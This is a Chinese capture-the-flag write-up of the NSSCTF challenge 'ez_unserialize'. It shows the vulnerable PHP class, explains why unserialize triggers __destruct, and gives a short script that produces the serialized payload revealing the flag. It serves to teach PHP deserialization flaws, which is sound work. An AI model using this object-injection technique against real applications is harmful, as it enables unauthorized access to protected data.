2026年3月27日NSSCTF之[SWPUCTF 2021 新生赛]ez_unserialize

[SWPUCTF 2021 新生赛]ez_unserialize

开启环境,进入并查看,可以看到一个动图,选择查看网页源码,得到

看到有隐藏信息,根据隐藏信息可以猜测,可以利用robots协议查看相关信息,访问得到

可以得到/c145s.php信息,进而访问,得到

php 复制代码
<?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?>

对此PHP代码分析

php 复制代码
class wllm{
    public $admin;
    public $passwd;

    // 构造方法:初始化属性值(反序列化时不会自动执行__construct)
    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

    // 析构方法:对象销毁时执行(反序列化后会自动触发)
    public function __destruct(){
        // 核心条件:admin严格等于"admin"、passwd严格等于"ctf"
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag; // 满足条件则输出flag
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

关键

bash 复制代码
__construct:仅在new wllm()时执行,反序列化时不会触发,因此初始化的admin=user、passwd=123456可被覆盖;
__destruct:反序列化生成的对象销毁时自动执行,是漏洞利用的核心入口;
条件判断用===(严格相等,需值和类型都匹配,这里都是字符串,只需值正确)
核心是实例化wllm类,手动赋值admin="admin"、passwd="ctf",再序列化

代码

php 复制代码
<?php
class wllm{
    public $admin;
    public $passwd;
}

// 实例化并赋值满足条件的属性
$obj = new wllm();
$obj->admin = "admin";
$obj->passwd = "ctf";

// 生成序列化字符串
echo serialize($obj);
?>

将序列化的结果get传参,得到最终结果

相关推荐
墨澜逸客4 小时前
《华胥文化》百回大纲
学习·其他·百度·学习方法·新浪微博
Stella Blog4 小时前
狂神Java基础学习笔记Day04
java·笔记·学习
一只机电自动化菜鸟4 小时前
一建机电备考笔记(17) 常用设备—通用设备1(含考频+题型)
笔记·学习·职场和发展·生活·学习方法
深蓝海拓4 小时前
基于QtPy (PySide6) 的PLC-HMI工程项目(十)框架初成的阶段总结
网络·笔记·python·学习·ui·plc
菜鸟‍4 小时前
【论文学习】Transformer中的数据流动
深度学习·学习·transformer
fmk10235 小时前
FastAPI + LangChain Agent 从零入门学习笔记
学习·langchain·fastapi
词元Max5 小时前
Java 转 AI Agent 开发学习路线(2026年3月最新版)
java·人工智能·学习
星幻元宇VR6 小时前
VR互动平台|开启沉浸式体验新方式
科技·学习·安全·vr·虚拟现实
qqacj6 小时前
Spring Security 官网文档学习
java·学习·spring
南無忘码至尊7 小时前
Unity学习90天 - 第 6 天 -学习物理 Material + 重力与阻力并实现弹跳球和冰面滑动效果
学习·unity·游戏引擎